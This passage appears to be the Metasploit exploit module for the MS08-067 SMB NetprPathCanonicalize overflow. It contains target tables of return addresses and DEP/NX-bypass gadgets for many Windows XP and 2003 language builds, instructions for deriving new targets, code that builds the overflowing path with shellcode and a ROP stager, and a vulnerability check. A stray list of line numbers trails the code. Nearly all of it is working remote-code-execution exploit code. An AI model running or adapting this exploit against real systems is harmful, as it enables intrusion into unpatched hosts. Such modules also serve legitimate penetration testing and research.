          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Spanish (NX)',
           {
             'Ret'       => 0x6fdbf807,
             'DisableNX' => 0x6fdc17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Finnish (NX)',
           {
             'Ret'       => 0x597df807,
             'DisableNX' => 0x597e17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 French (NX)',
           {
             'Ret'       => 0x595bf807,
             'DisableNX' => 0x595c17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Hebrew (NX)',
           {
             'Ret'       => 0x5940f807,
             'DisableNX' => 0x594117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Hungarian (NX)',
           {
             'Ret'       => 0x5970f807,
             'DisableNX' => 0x597117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Italian (NX)',
           {
             'Ret'       => 0x596bf807,
             'DisableNX' => 0x596c17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Japanese (NX)',
           {
             'Ret'       => 0x567fd4d2,
             'DisableNX' => 0x568017c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Korean (NX)',
           {
             'Ret'       => 0x6fd6f807,
             'DisableNX' => 0x6fd717c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Dutch (NX)',
           {
             'Ret'       => 0x596cf807,
             'DisableNX' => 0x596d17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Norwegian (NX)',
           {
             'Ret'       => 0x597cf807,
             'DisableNX' => 0x597d17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Polish (NX)',
           {
             'Ret'       => 0x5941f807,
             'DisableNX' => 0x594217c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Portuguese - Brazilian (NX)',
           {
             'Ret'       => 0x596ff807,
             'DisableNX' => 0x597017c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Portuguese (NX)',
           {
             'Ret'       => 0x596bf807,
             'DisableNX' => 0x596c17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Russian (NX)',
           {
             'Ret'       => 0x6fe1f807,
             'DisableNX' => 0x6fe217c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Swedish (NX)',
           {
             'Ret'       => 0x597af807,
             'DisableNX' => 0x597b17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Turkish (NX)',
           {
             'Ret'       => 0x5a78f807,
             'DisableNX' => 0x5a7917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          #
          # Windows 2003 Targets
          #

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 English (NO NX)',
           {
             'Ret'       => 0x71bf21a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP1
          ['Windows 2003 SP1 English (NX)',
           {
             'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 Japanese (NO NX)',
           {
             'Ret'       => 0x71a921a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 Spanish (NO NX)',
           {
             'Ret'       => 0x71ac21a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP1
          ['Windows 2003 SP1 Spanish (NX)',
           {
             'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          # Standard return-to-ESI without NX bypass
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP1 French (NO NX)',
            {
              'Ret'       => 0x71ac1c40 ,
              'Scratch'   => 0x00020408
            }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP1
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP1 French (NX)',
            {
              'RetDec'    => 0x7CA2568C,  # dec ESI, ret @SHELL32.DLL
              'RetPop'    => 0x7CB47CF4,  # push ESI, pop EBP, ret 4 @SHELL32.DLL
              'JmpESP'    => 0x7C98FED3,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7C95E413,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408
            }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 English (NO NX)',
           {
             'Ret'       => 0x71bf3969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 English (NX)',
           {
             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 German (NO NX)',
           {
             'Ret'       => 0x71a03969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 German (NX)',
           {
             'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Portuguese (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
          [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 Spanish (NO NX)',
           {
             'Ret'       => 0x71ac3969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 Spanish (NX)',
           {
             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Standard return-to-ESI without NX bypass
          # Provided by Masashi Fujiwara
          ['Windows 2003 SP2 Japanese (NO NX)',
           {
             'Ret'       => 0x71a91ed2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI WS2HELP.DLL

          # Standard return-to-ESI without NX bypass
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP2 French (NO NX)',
            {
              'Ret'       => 0x71AC2069,
              'Scratch'   => 0x00020408
            }
          ], # CALL ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP2 French (NX)',
            {
              'RetDec'    => 0x7C98BEB8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7CB3E84E,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Chinese - Simplified (NX)',
            {
              'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Czech (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Dutch (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Hungarian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Italian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Russian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Swedish (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Turkish (NX)',
            {
              'RetDec'    => 0x7c96beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c96a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c93f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          #
          # Missing Targets
          # Key:   T=TODO   ?=UNKNOWN   U=UNRELIABLE
          #
          # [?] Windows Vista SP0 - Not tested yet
          # [?] Windows Vista SP1 - Not tested yet
          #
        ],

      'DisclosureDate' => '2008-10-28'))

    register_options(
      [
        OptString.new('SMBPIPE', [true,  'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),
      ])

    deregister_options('SMB::ProtocolVersion')
  end

  #
  #
  #   *** WINDOWS XP SP2/SP3 TARGETS ***
  #
  #
  #   This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
  #   for the process and then returns back to a call ESI instruction. These addresses are different
  #   between operating systems, service packs, and language packs, but the steps below can be used to
  #   add new targets.
  #
  #
  #   If the target system does not have NX/NX, just place a "call ESI" return into both the Ret	and
  #   DisableNX elements of the target hash.
  #
  #   If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
  #   First obtain the value for the Ret element of the hash with the following command:
  #
  #   $ msfpescan -j esi acgenral.dll
  #
  #   Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
  #
  #   Next, find the location of the function we use to disable NX. Use the following command:
  #
  #   $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
  #
  #   This address should be placed into the DisableNX element of the target hash.
  #
  #   The Scratch element of 0x00020408 should work on all versions of Windows
  #
  #   The actual function we use to disable NX looks like this:
  #
  #     push    4
  #     lea     eax, [ebp+arg_0]
  #     push    eax
  #     push    22h
  #     push    0FFFFFFFFh
  #     mov     [ebp+arg_0], 2
  #     call    ds:__imp__NtSetInformationProcess@16
  #
  #
  #   *** WINDOWS XP NON-NX TARGETS ***
  #
  #
  #   Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
  #   jump, and finally the shellcode.
  #
  #
  #   *** WINDOWS 2003 SP2 TARGETS ***
  #
  #
  #   There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
  #   both of these are inside NTDLL.DLL and use a return method that is not directly compatible
  #   with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
  #   that eventually leads to the NX bypass function.
  #
  #
  #   *** WINDOWS 2000 TARGETS ***
  #
  #
  #   No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
  #   jump, and finally the shellcode.
  #
  #
  #   *** WINDOWS VISTA TARGETS ***
  #
  #   Currently untested, will involve ASLR and NX, should be fun.
  #
  #
  #   *** NetprPathCanonicalize IDL ***
  #
  #
  #   NET_API_STATUS NetprPathCanonicalize(
  #   [in, string, unique] SRVSVC_HANDLE ServerName,
  #   [in, string] WCHAR* PathName,
  #   [out, size_is(OutbufLen)] unsigned char* Outbuf,
  #   [in, range(0,64000)] DWORD OutbufLen,
  #   [in, string] WCHAR* Prefix,
  #   [in, out] DWORD* PathType,
  #   [in] DWORD Flags
  #   );
  #

  def exploit
    begin
      connect(versions: [1])
      smb_login
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      if e.message =~ /Connection reset/
        print_error('Connection reset during login')
        print_error('This most likely means a previous exploit attempt caused the service to crash')
        return
      else
        raise e
      end
    end

    # Use a copy of the target
    mytarget = target

    if target['auto']

      mytarget = nil

      print_status('Automatically detecting the target...')
      fprint = smb_fingerprint

      print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")

      # Bail early on unknown OS
      if (fprint['os'] == 'Unknown')
        fail_with(Failure::NoTarget, 'No matching target')
      end

      # Windows 2000 is mostly universal
      if (fprint['os'] == 'Windows 2000')
        mytarget = targets[1]
      end

      # Windows XP SP0/SP1 is mostly universal
      if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'
        mytarget = targets[2]
      end

      # Windows 2003 SP0 is mostly universal
      if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?
        mytarget = targets[3]
      end

      # Windows 2003 R2 is treated the same as 2003
      if (fprint['os'] == 'Windows 2003 R2')
        fprint['os'] = 'Windows 2003'
      end

      # Service Pack match must be exact
      if (not mytarget) and fprint['sp'].index('+')
        print_error('Could not determine the exact service pack')
        print_error("Auto-targeting failed, use 'show targets' to manually select one")
        disconnect
        return
      end

      # Language Pack match must be exact or we default to English
      if (not mytarget) and fprint['lang'] == 'Unknown'
        print_status('We could not detect the language pack, defaulting to English')
        fprint['lang'] = 'English'
      end

      # Normalize the service pack string
      fprint['sp'].gsub!(/Service Pack\s+/, 'SP')

      unless mytarget
        targets.each do |t|
          # Prefer AlwaysOn NX over NX, and NX over non-NX
          if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/
            mytarget = t
            break
          end
          if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/
            mytarget = t
            break
          end
        end
      end

      unless mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
    end

    #
    # Build the malicious path name
    #

    padder = [*('A'..'Z')]
    pad = 'A'
    while pad.length < 7
      c = padder[rand(padder.length)]
      next if pad.index(c)
      pad += c
    end

    prefix = '\\'
    path   = ''
    server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase

    #
    # Windows 2003 SP2 (NX) targets
    #
    if mytarget['RetDec']

      jumper = Rex::Text.rand_text_alpha(70).upcase
      jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room

      jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space
      jumper[ 8, 4] = [mytarget['RetDec']].pack('V')
      jumper[ 12, 4] = [mytarget['RetDec']].pack('V')
      jumper[ 16, 4] = [mytarget['RetDec']].pack('V')

      jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP
      jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')

      jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')
      jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')
      jumper[ 64, 2] = "\xeb\x02"                    # our jump
      jumper[ 68, 2] = "\xeb\x62"                    # original

      path =
        Rex::Text.to_unicode('\\') +

        # This buffer is removed from the front
        Rex::Text.rand_text_alpha(100) +

        # Shellcode
        payload.encoded +

        # Relative path to trigger the bug
        Rex::Text.to_unicode('\\..\\..\\') +

        # Extra padding
        Rex::Text.to_unicode(pad) +

        # Writable memory location (static)
        [mytarget['Scratch']].pack('V') + # EBP

        # Return to code which disables NX (or just the return)
        [mytarget['RetDec']].pack('V') +

        # Padding with embedded jump
        jumper +

        # NULL termination
        "\x00" * 2

    #
    # Windows XP SP2/SP3 ROP Stager targets
    #
    elsif mytarget['UseROP']

      rop = generate_rop(mytarget['UseROP'])

      path =
        Rex::Text.to_unicode('\\') +

        # This buffer is removed from the front
        Rex::Text.rand_text_alpha(100) +

        # Shellcode
        payload.encoded +

        # Relative path to trigger the bug
        Rex::Text.to_unicode('\\..\\..\\') +

        # Extra padding
        Rex::Text.to_unicode(pad) +

        # ROP Stager
        rop +

        # Padding (skipped)
        Rex::Text.rand_text_alpha(2) +

        # NULL termination
        "\x00" * 2

    #
    # Windows 2000, XP (NX), and 2003 (NO NX) targets
    #
    else

      jumper = Rex::Text.rand_text_alpha(70).upcase
      jumper[ 4, 4] = [mytarget.ret].pack('V')
      jumper[50, 8] = make_nops(8)
      jumper[58, 2] = "\xeb\x62"

      path =
        Rex::Text.to_unicode('\\') +

        # This buffer is removed from the front
        Rex::Text.rand_text_alpha(100) +

        # Shellcode
        payload.encoded +

        # Relative path to trigger the bug
        Rex::Text.to_unicode('\\..\\..\\') +

        # Extra padding
        Rex::Text.to_unicode(pad) +

        # Writable memory location (static)
        [mytarget['Scratch']].pack('V') + # EBP

        # Return to code which disables NX (or just the return)
        [mytarget['DisableNX'] || mytarget.ret].pack('V') +

        # Padding with embedded jump
        jumper +

        # NULL termination
        "\x00" * 2

    end

    handle = dcerpc_handle(
      '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )

    dcerpc_bind(handle)

    stub =
      NDR.uwstring(server) +
      NDR.UnicodeConformantVaryingStringPreBuilt(path) +
      NDR.long(rand(1024)) +
      NDR.wstring(prefix) +
      NDR.long(4097) +
      NDR.long(0)

    # NOTE: we don't bother waiting for a response here...
    print_status('Attempting to trigger the vulnerability...')
    dcerpc.call(0x1f, stub, false)

    # Cleanup
    handler
    disconnect
  end

  def check
    begin
      connect(versions: [1])
      smb_login
    rescue Rex::ConnectionError => e
      vprint_error("Connection failed: #{e.class}: #{e}")
      return Msf::Exploit::CheckCode::Unknown
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      if e.message =~ /Connection reset/
        vprint_error('Connection reset during login')
        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
        return Msf::Exploit::CheckCode::Unknown
      else
        raise e
      end
    end

    #
    # Build the malicious path name
    # 5b878ae7 "db @eax;g"
    prefix = '\\'
    path =
      "\x00\\\x00/" * 0x10 +
      Rex::Text.to_unicode('\\') +
      Rex::Text.to_unicode('R7') +
      Rex::Text.to_unicode('\\..\\..\\') +
      Rex::Text.to_unicode('R7') +
      "\x00" * 2

    server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase

    handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
                           'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )

    begin
      # Samba doesn't have this handle and returns an ErrorCode
      dcerpc_bind(handle)
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("SMB error: #{e.message}")
      return Msf::Exploit::CheckCode::Safe
    end

    vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)

    stub =
      NDR.uwstring(server) +
      NDR.UnicodeConformantVaryingStringPreBuilt(path) +
      NDR.long(8) +
      NDR.wstring(prefix) +
      NDR.long(4097) +
      NDR.long(0)

    resp = dcerpc.call(0x1f, stub)
    error = resp[4, 4].unpack('V')[0]

    # Cleanup
    simple.client.close
    simple.client.tree_disconnect
    disconnect

    if (error == 0x0052005c) # \R :)
      return Msf::Exploit::CheckCode::Vulnerable
    else
      vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
      return Msf::Exploit::CheckCode::Safe
    end
  end

  def generate_rop(version)
    free_byte = "\x90"
    # free_byte = "\xcc"

    # create a few small gadgets
    #  <free byte>; pop edx; pop ecx; ret
    gadget1 = free_byte + "\x5a\x59\xc3"
    #  mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
    gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
    #  <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
    gadget3 = "\xcc" + free_byte + "\xeb\x5a"

    # gadget2:
    #  get eax into edi
    #  adjust edi
    #  get 0x7f in ecx
    #  copy the data
    #  jmp to it
    #
    dws = gadget2.unpack('V*')

    ##
    # Create the ROP stager, pfew.. Props to corelanc0d3r!
    # This was no easy task due to space limitations :-/
    # -jduck
    ##
    module_name = 'ACGENRAL.DLL'
    module_base = 0x6f880000

    rvasets = {}
    # XP SP2
    rvasets['5.1.2600.2180'] = {
      # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret
      'call_HeapCreate'                          => 0x21064,
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,
      'pop ecx / ret'                            => 0x2e546 + 6,
      'mov [eax], ecx / ret'                     => 0xd182,
      'jmp eax'                                  => 0x19b85,
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,
      'mov [eax+0x10], ecx / ret'                => 0x10976 + 6,
      'add eax, 8 / ret'                         => 0x29a14
    }

    # XP SP3
    rvasets['5.1.2600.5512'] = {
      # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
      'call_HeapCreate'                          => 0x21286,
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
      'pop ecx / ret'                            => 0x2e796 + 6,
      'mov [eax], ecx / ret'                     => 0xd296,
      'jmp eax'                                  => 0x19c6f,
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
      'mov [eax+0x10], ecx / ret'                => 0x10a56 + 6,
      'add eax, 8 / ret'                         => 0x29c64
    }

    # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
    rop = [
      # prime ebp (adjustment distance)
      0x00018000,

      # get some RWX memory via HeapCreate
      'call_HeapCreate',
      0x01040110, # flOptions (gets & with 0x40005)
      0x01010101,
      0x01010101,

      # adjust the returned pointer
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret',

      # setup gadget1
      'pop ecx / ret',
      gadget1.unpack('V').first,
      'mov [eax], ecx / ret',

      # execute gadget1
      'jmp eax',

      # setup gadget2 (via gadget1)
      dws[0],
      dws[1],
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',

      # setup part3 of gadget2
      'pop ecx / ret',
      dws[2],
      'mov [eax+0x10], ecx / ret',

      # execute gadget2
      'add eax, 8 / ret',
      'jmp eax',

      # gadget3 gets executed after gadget2 (luckily)
      gadget3.unpack('V').first
    ]

    # convert the meta rop into concrete bytes
    rvas = rvasets[version]

    rop.map! { |e|
      if e.kind_of? String
        # Meta-replace (RVA)
        fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
        module_base + rvas[e]

      elsif e == :unused
        # Randomize
        rand_text(4).unpack('V').first

      else
        # Literal
        e
      end
    }

    ret = rop.pack('V*')

    # check badchars?
    # idx = Rex::Text.badchar_index(ret, payload_badchars)

    ret
  end
end
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
